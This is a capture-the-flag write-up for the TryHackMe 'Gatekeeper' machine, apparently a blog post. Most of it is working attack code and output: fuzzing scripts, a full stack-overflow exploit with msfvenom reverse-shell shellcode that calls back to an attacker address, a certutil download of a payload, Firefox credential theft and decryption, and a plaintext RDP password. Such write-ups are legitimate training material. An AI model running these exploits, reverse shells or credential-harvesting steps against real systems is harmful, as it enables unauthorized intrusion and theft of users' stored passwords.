tryhackme-Gatekeeper

Information gathering

Start with an nmap port scan; the commands and results are below.

nmap -sT -p- --min-rate 10000 -oA openPort
nmap -sV -O -A -p port1,port2,portN -oA version
nmap --script=smb-enum-users.nse,smb-enum-shares.nse,smb-vuln-ms17-010.nse -p 135,139,445 -oA 445Port
# Nmap 7.94SVN scan initiated Sat Jul 13 23:05:09 2024 as: nmap -sT -p- --min-rate 10000 -oA openPort 10.10.130.100
Warning: 10.10.130.100 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.130.100
Host is up (0.24s latency).
Not shown: 65262 closed tcp ports (conn-refused), 262 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
31337/tcp open  Elite
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49163/tcp open  unknown
49164/tcp open  unknown

# Nmap done at Sat Jul 13 23:05:39 2024 -- 1 IP address (1 host up) scanned in 30.48 seconds
# Nmap 7.94SVN scan initiated Sat Jul 13 23:07:13 2024 as: nmap -sV -O -A --min-rate 10000 -oA version -p 135,139,445,3389,31337,49152-49155,49163-49164 10.10.130.100
Nmap scan report for 10.10.130.100
Host is up (0.25s latency).

PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server?
|_ssl-date: 2024-07-14T03:10:14+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=gatekeeper
| Not valid before: 2024-07-13T03:05:08
|_Not valid after:  2025-01-12T03:05:08
| rdp-ntlm-info: 
|   Target_Name: GATEKEEPER
|   NetBIOS_Domain_Name: GATEKEEPER
|   NetBIOS_Computer_Name: GATEKEEPER
|   DNS_Domain_Name: gatekeeper
|   DNS_Computer_Name: gatekeeper
|   Product_Version: 6.1.7601
|_  System_Time: 2024-07-14T03:10:08+00:00
31337/tcp open  Elite?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|     Hello
|   GenericLines: 
|     Hello 
|     Hello
|   GetRequest: 
|     Hello GET / HTTP/1.0
|     Hello
|   HTTPOptions: 
|     Hello OPTIONS / HTTP/1.0
|     Hello
|   Help: 
|     Hello HELP
|   Kerberos: 
|     Hello !!!
|   LDAPSearchReq: 
|     Hello 0
|     Hello
|   LPDString: 
|     Hello 
|     default!!!
|   RTSPRequest: 
|     Hello OPTIONS / RTSP/1.0
|     Hello
|   SIPOptions: 
|     Hello OPTIONS sip:nm SIP/2.0
|     Hello Via: SIP/2.0/TCP nm;branch=foo
|     Hello From: <sip:nm@nm>;tag=root
|     Hello To: <sip:nm2@nm2>
|     Hello Call-ID: 50000
|     Hello CSeq: 42 OPTIONS
|     Hello Max-Forwards: 70
|     Hello Content-Length: 0
|     Hello Contact: <sip:nm@nm>
|     Hello Accept: application/sdp
|     Hello
|   SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|_    Hello
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
49163/tcp open  msrpc          Microsoft Windows RPC
49164/tcp open  msrpc          Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.94SVN%I=7%D=7/13%Time=669340EF%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,24,"Hello\x20GET\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n"
SF:)%r(SIPOptions,142,"Hello\x20OPTIONS\x20sip:nm\x20SIP/2\.0\r!!!\nHello\
SF:x20Via:\x20SIP/2\.0/TCP\x20nm;branch=foo\r!!!\nHello\x20From:\x20<sip:n
SF:m@nm>;tag=root\r!!!\nHello\x20To:\x20<sip:nm2@nm2>\r!!!\nHello\x20Call-
SF:ID:\x2050000\r!!!\nHello\x20CSeq:\x2042\x20OPTIONS\r!!!\nHello\x20Max-F
SF:orwards:\x2070\r!!!\nHello\x20Content-Length:\x200\r!!!\nHello\x20Conta
SF:ct:\x20<sip:nm@nm>\r!!!\nHello\x20Accept:\x20application/sdp\r!!!\nHell
SF:o\x20\r!!!\n")%r(GenericLines,16,"Hello\x20\r!!!\nHello\x20\r!!!\n")%r(
SF:HTTPOptions,28,"Hello\x20OPTIONS\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!
SF:\n")%r(RTSPRequest,28,"Hello\x20OPTIONS\x20/\x20RTSP/1\.0\r!!!\nHello\x
SF:20\r!!!\n")%r(Help,F,"Hello\x20HELP\r!!!\n")%r(SSLSessionReq,C,"Hello\x
SF:20\x16\x03!!!\n")%r(TerminalServerCookie,B,"Hello\x20\x03!!!\n")%r(TLSS
SF:essionReq,C,"Hello\x20\x16\x03!!!\n")%r(Kerberos,A,"Hello\x20!!!\n")%r(
SF:FourOhFourRequest,47,"Hello\x20GET\x20/nice%20ports%2C/Tri%6Eity\.txt%2
SF:ebak\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(LPDString,12,"Hello\x20\x0
SF:1default!!!\n")%r(LDAPSearchReq,17,"Hello\x200\x84!!!\nHello\x20\x01!!!
SF:\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 7 Ultimate SP1 or Windows 8.1 Update 1 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:d8:aa:d3:b1:8d (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: gatekeeper
|   NetBIOS computer name: GATEKEEPER\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-07-13T23:10:07-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 48m00s, deviation: 1h47m20s, median: 0s
| smb2-time: 
|   date: 2024-07-14T03:10:07
|_  start_date: 2024-07-14T03:05:02

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   249.25 ms 10.9.0.1
2   249.34 ms 10.10.130.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 13 23:10:14 2024 -- 1 IP address (1 host up) scanned in 181.09 seconds
# Nmap 7.94SVN scan initiated Sat Jul 13 23:10:30 2024 as: nmap --script=smb-enum-users.nse,smb-enum-shares.nse,smb-vuln-ms17-010.nse -p135,139,445 -oA /home/kali/Gatekeeper/445Port 10.10.130.100
Nmap scan report for 10.10.130.100
Host is up (0.25s latency).

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.130.100\ADMIN$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.130.100\C$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.130.100\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ
|     Current user access: READ/WRITE
|   \\10.10.130.100\Users: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Anonymous access: <none>
|_    Current user access: READ

# Nmap done at Sat Jul 13 23:11:22 2024 -- 1 IP address (1 host up) scanned in 52.26 seconds

From the scan results, the ports that are useful to us are 445, 3389 and 31337.

The 445 results show a Users share that the guest account can read. Connecting to it reveals a program, gatekeeper.exe, which we download.

Run it in a local virtual machine.

It sits waiting for connections, so it presumably listens on a port. Given the scan result, the guess is that this program is what opens 31337; check with netstat -an -p tcp.

Connect with nc to see what it does.

This program may have a stack-based buffer overflow. Check whether the target's port 31337 behaves the same as the local copy.

It is the same program.

The plan is to debug the program for the stack overflow and exploit it. The steps are the same as in earlier exercises, so they are not explained in detail here.

Vulnerability debugging

I wrote a simple fuzzing script with pwntools

import time
from pwn import *
# context(log_level="debug")


padding = b"A" * 50
while True:
    try:
        # connect to the local copy of gatekeeper.exe running under the debugger
        p = remote("192.168.226.132", 31337, timeout=5)
        p.sendline(padding)
        print(f"send {len(padding)} bytes Test!")
        # the service echoes "Hello <input>"; a crash shows up as EOF or no reply
        reply = p.recv(timeout=5)
        p.close()
        if not reply:
            print(f"no reply at {len(padding)} bytes, probably crashed")
            break
    except Exception as e:
        print(f"at {len(padding)} bytes error: {e}")
        break
    padding += b"A" * 50
    time.sleep(1)

The script grows the buffer by 50 bytes each round. Run the program under the debugger first.

Run the script.


The script stalled at 150 bytes. Next, find exactly which bytes of the input land in EIP; I wrote the following script for that

from pwn import *
context(log_level='debug')

offset = 0
payload = b"A" * offset
payload += b""

p = remote("10.10.163.211",31337)
p.sendline(payload)

p.recv()

Generate 150 characters with msf-pattern_create -l 150 and fill them into the payload += b"" line

from pwn import *
context(log_level='debug')

offset = 0
payload = b"A" * offset
payload += b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"

p = remote("10.10.163.211",31337)
p.sendline(payload)

p.recv()

Restart the program and run the script.

Copy the EIP value from the debugger and use msf-pattern_offset -q <EIP> to find the offset.


The offset to EIP is 146 bytes; put that value in the offset variable.

offset = 146
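The two Metasploit helpers used here can be reproduced in a few lines of Python, which is handy on a box without msf-pattern_create. This is an added example, not code from the original write-up: pattern_create builds the same Aa0Aa1... sequence, pattern_offset finds where a given EIP value sits in it, and build_probe produces the filler-plus-marker payload used to confirm control of EIP. The EIP value 0x39654138 in the usage is not copied from the page's screenshot; it is the dword that the 150-byte pattern contains at offset 146 ("8Ae9" read little-endian), so it reproduces the result the page reports.

```python
import string
import struct


def pattern_create(length: int) -> bytes:
    """Build the Metasploit-style cyclic pattern (Aa0Aa1Aa2...) of the given length.

    Every 3-byte group is unique for the first 26*26*10*3 = 20280 bytes,
    so any 4 bytes that land in EIP identify exactly one buffer position.
    """
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern: bytes, eip):
    """Return the offset of the crash value inside the pattern, or None.

    eip may be the integer shown by the debugger (e.g. 0x39654138) or the raw
    4 bytes as they sit in memory.  The debugger shows the register value,
    i.e. the little-endian dword, so an int is packed with "<I" first.
    """
    if isinstance(eip, int):
        needle = struct.pack("<I", eip)
    else:
        needle = bytes(eip)
    idx = pattern.find(needle)
    return None if idx == -1 else idx


def build_probe(offset: int, marker: bytes = b"BBBB") -> bytes:
    """Payload that proves control of EIP: offset bytes of filler, then the marker.

    With offset=146 the debugger should show EIP == 0x42424242 ("BBBB").
    """
    return b"A" * offset + marker


if __name__ == "__main__":
    pat = pattern_create(150)
    print(pat.decode())
    # 0x39654138 is the dword at offset 146 of this pattern ("8Ae9"), computed, not a screenshot
    print("offset:", pattern_offset(pat, 0x39654138))
    probe = build_probe(146)
    print("EIP will be:", hex(struct.unpack("<I", probe[146:150])[0]))
```

pattern_offset accepts the register value as an int precisely because that is what the debugger shows; passing the bytes as seen in a hex dump works too. If the value is not found at all, the crash did not come from this pattern (wrong length, or the input was truncated by a bad character before reaching EIP).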

Next, remove the pattern from the script and add a line payload += b"BBBB"

from pwn import *
context(log_level='debug')

offset = 146
payload = b"A" * offset
payload += b"BBBB"

p = remote("192.168.226.132",31337)
p.sendline(payload)

p.recv()

Restart the program and run the script again. This time the EIP value is the proof: it should be overwritten with 42424242 (BBBB).


Success.
Next, generate every byte value except \x00 and test for bad characters

!mona bytearray -b "\x00"


Add the byte array to the script

from pwn import *
context(log_level='debug')

offset = 146
payload = b"A" * offset
payload += b"BBBB"
payload += (
	b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
	b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
	b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
	b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
	b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
	b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
	b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
	b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

p = remote("192.168.226.132",31337)
p.sendline(payload)

p.recv()

Restart the program and run the script again


Copy the ESP value and run the mona compare against it to find the bad characters

!mona compare -f C:\mona\gatekeeper\bytearray.bin -a 009E19E4


The bad characters are \x00 and \x0a. Next, look for a jmp esp whose address contains neither (-cpb excludes them from the results)

!mona jmp -r esp -cpb "\x00\x0a"


Write the address into the payload little-endian, in place of BBBB

payload += b"\xc3\x14\x04\x08"	# 0x080414c3 

Then generate the shellcode and append it to the payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.226.131 LPORT=4444 EXITFUNC=thread -b "\x00\x0a" -f c

So that the shellcode executes reliably, put some NOPs (\x90) in front of it: the decoder stub of the encoded msfvenom payload uses the stack right where ESP points, so give it a little room. The final script is:

from pwn import *
context(log_level='debug')

offset = 146
payload = b"A" * offset
payload += b"\xc3\x14\x04\x08"	# 0x080414c3 
payload += b"\x90" * 16
payload += (
	b"\xdb\xc2\xba\xdb\x7f\xc7\xbd\xd9\x74\x24\xf4\x5b\x31\xc9"
	b"\xb1\x52\x31\x53\x17\x83\xc3\x04\x03\x88\x6c\x25\x48\xd2"
	b"\x7b\x2b\xb3\x2a\x7c\x4c\x3d\xcf\x4d\x4c\x59\x84\xfe\x7c"
	b"\x29\xc8\xf2\xf7\x7f\xf8\x81\x7a\xa8\x0f\x21\x30\x8e\x3e"
	b"\xb2\x69\xf2\x21\x30\x70\x27\x81\x09\xbb\x3a\xc0\x4e\xa6"
	b"\xb7\x90\x07\xac\x6a\x04\x23\xf8\xb6\xaf\x7f\xec\xbe\x4c"
	b"\x37\x0f\xee\xc3\x43\x56\x30\xe2\x80\xe2\x79\xfc\xc5\xcf"
	b"\x30\x77\x3d\xbb\xc2\x51\x0f\x44\x68\x9c\xbf\xb7\x70\xd9"
	b"\x78\x28\x07\x13\x7b\xd5\x10\xe0\x01\x01\x94\xf2\xa2\xc2"
	b"\x0e\xde\x53\x06\xc8\x95\x58\xe3\x9e\xf1\x7c\xf2\x73\x8a"
	b"\x79\x7f\x72\x5c\x08\x3b\x51\x78\x50\x9f\xf8\xd9\x3c\x4e"
	b"\x04\x39\x9f\x2f\xa0\x32\x32\x3b\xd9\x19\x5b\x88\xd0\xa1"
	b"\x9b\x86\x63\xd2\xa9\x09\xd8\x7c\x82\xc2\xc6\x7b\xe5\xf8"
	b"\xbf\x13\x18\x03\xc0\x3a\xdf\x57\x90\x54\xf6\xd7\x7b\xa4"
	b"\xf7\x0d\x2b\xf4\x57\xfe\x8c\xa4\x17\xae\x64\xae\x97\x91"
	b"\x95\xd1\x7d\xba\x3c\x28\x16\x05\x68\xd0\x65\xed\x6b\x14"
	b"\x7b\xb2\xe2\xf2\x11\x5a\xa3\xad\x8d\xc3\xee\x25\x2f\x0b"
	b"\x25\x40\x6f\x87\xca\xb5\x3e\x60\xa6\xa5\xd7\x80\xfd\x97"
	b"\x7e\x9e\x2b\xbf\x1d\x0d\xb0\x3f\x6b\x2e\x6f\x68\x3c\x80"
	b"\x66\xfc\xd0\xbb\xd0\xe2\x28\x5d\x1a\xa6\xf6\x9e\xa5\x27"
	b"\x7a\x9a\x81\x37\x42\x23\x8e\x63\x1a\x72\x58\xdd\xdc\x2c"
	b"\x2a\xb7\xb6\x83\xe4\x5f\x4e\xe8\x36\x19\x4f\x25\xc1\xc5"
	b"\xfe\x90\x94\xfa\xcf\x74\x11\x83\x2d\xe5\xde\x5e\xf6\x05"
	b"\x3d\x4a\x03\xae\x98\x1f\xae\xb3\x1a\xca\xed\xcd\x98\xfe"
	b"\x8d\x29\x80\x8b\x88\x76\x06\x60\xe1\xe7\xe3\x86\x56\x07"
	b"\x26"
)

p = remote("192.168.226.132",31337)
p.sendline(payload)

p.recv()
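The bad-character step and the final assembly above are done by hand with mona and by editing the script. The block below is an added example, not the write-up's own script and not mona's code: bytearray_probe generates the same byte array as !mona bytearray -b "\x00", find_bad_chars reports which sent bytes were lost or altered when compared with what actually landed at ESP (what !mona compare does from a memory dump), and build_payload assembles filler + return address + NOP sled + shellcode while refusing any component that contains a bad character. The memory dump in the usage is constructed: it is what the program would leave on the stack if it stops reading at the first \x0a, which matches the page's finding that \x00 and \x0a are bad. The shellcode in the usage is an INT3 placeholder, not the msfvenom output from the page, and send_payload uses a plain socket instead of pwntools so the block runs without it.

```python
import socket
import struct

BAD_CHARS = {0x00, 0x0a}  # what the mona compare on the page reported


def bytearray_probe(exclude=(0x00,)) -> bytes:
    # Every byte value 0x00..0xff except those in exclude, ascending.
    # Same content as `!mona bytearray -b "\x00"`; sent right after the EIP marker.
    return bytes(b for b in range(256) if b not in exclude)


def find_bad_chars(sent: bytes, dump: bytes) -> list:
    """Compare what was sent with what ended up in memory at ESP.

    Returns the sent bytes that are missing or altered.  Three cases are
    handled: the copy stopped at a byte (string terminator such as \\x0a),
    a byte was replaced in place, or a byte was dropped and everything
    after it shifted left (the dump is realigned so later bytes still match).
    """
    bad = []
    j = 0  # index into dump
    for i, expected in enumerate(sent):
        if j >= len(dump):
            bad.append(expected)  # the copy was cut off at this byte
            break
        if dump[j] == expected:
            j += 1
            continue
        bad.append(expected)
        # dropped byte: the next sent byte is already sitting at dump[j]
        if i + 1 < len(sent) and dump[j] == sent[i + 1]:
            continue
        j += 1  # replaced in place: keep both buffers aligned
    return bad


def build_payload(offset: int, ret_addr: int, shellcode: bytes,
                  badchars=BAD_CHARS, nop_sled: int = 16) -> bytes:
    """filler + little-endian jmp esp address + NOP sled + shellcode.

    ret_addr is the jmp esp address as an int (0x080414c3 on the page).
    A return address or shellcode containing a bad character would be
    silently truncated by the target, so it is rejected here instead.
    """
    ret = struct.pack("<I", ret_addr)
    for name, part in (("ret", ret), ("shellcode", shellcode)):
        hit = [b for b in part if b in badchars]
        if hit:
            raise ValueError(f"{name} contains bad chars: {[hex(b) for b in hit]}")
    return b"A" * offset + ret + b"\x90" * nop_sled + shellcode


def send_payload(host: str, port: int, payload: bytes, timeout: float = 5) -> bytes:
    """Deliver the payload the way the pwntools scripts do (sendline), return the echo."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload + b"\n")
        try:
            return s.recv(4096)
        except socket.timeout:
            return b""


if __name__ == "__main__":
    # Constructed dump: the program stops copying at the first \x0a,
    # so only 0x01..0x09 reach the stack.
    probe = bytearray_probe()
    fake_dump = probe[:9]
    print("bad chars:", [hex(b) for b in find_bad_chars(probe, fake_dump)])

    # Placeholder shellcode (INT3 breakpoints), not the page's msfvenom output.
    payload = build_payload(146, 0x080414C3, b"\xcc" * 8)
    print(len(payload), "bytes; EIP ->", payload[146:150].hex())
    # send_payload("192.168.226.132", 31337, payload)  # against the debugged copy
```

In practice the dump passed to find_bad_chars is the bytes read from the debugger at ESP; once a terminating byte such as \x0a is found, that byte is removed from the probe and the comparison is repeated, since everything after it could not be checked in the first pass. The same check in build_payload catches the common mistake of reusing shellcode that was generated without -b after the bad-character list changed.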

Restart the program, start a listener on port 4444, run the script and get a reverse shell.

Getting the FLAG

Same steps against the target: change the IP in the script, and regenerate the shellcode with LHOST set to the attacking machine's VPN address (the shellcode above calls back to 192.168.226.131, which is only reachable inside the local lab). Run it to get a reverse shell on the target.

Get user.txt

Privilege escalation

My privilege escalation did not succeed at first, so here is what I tried. When generating the reverse shell I could have produced a meterpreter payload directly, but I generated a plain shell, so I had to upgrade to a meterpreter session.
I generated a shell.exe, served it with python -m http.server 80, downloaded it on the target with certutil -split -f -urlcache, and got a meterpreter session.

Then I tried post/multi/recon/local_exploit_suggester to find possible privilege escalations.

Trying the last suggestion did not give me a shell, and I don't know why.

winPEAS produced no output, and manual enumeration turned up nothing useful, so I was stuck. A blog write-up showed that the path is credentials saved in Firefox.
Use the firefox_creds post module (post/multi/gather/firefox_creds) to save the credential files.


I renamed the downloaded loot files back to their original Firefox profile names so the decrypt script can find them.

Next, a script from GitHub is needed to decrypt these credentials: https://github.com/unode/firefox_decrypt/blob/main/firefox_decrypt.py
Running it yields the credentials of the user mayor

python firefox_decrypt.py ./firefox

The ./firefox folder holds all of the exported profile files.

Then connect to the target with xfreerdp

xfreerdp /u:mayor /p:8CL7O1N78MdrCIsV /sec:rdp /v:10.10.163.211 +clipboard

Get root.txt

End of the exercise.

posted @ Junglezt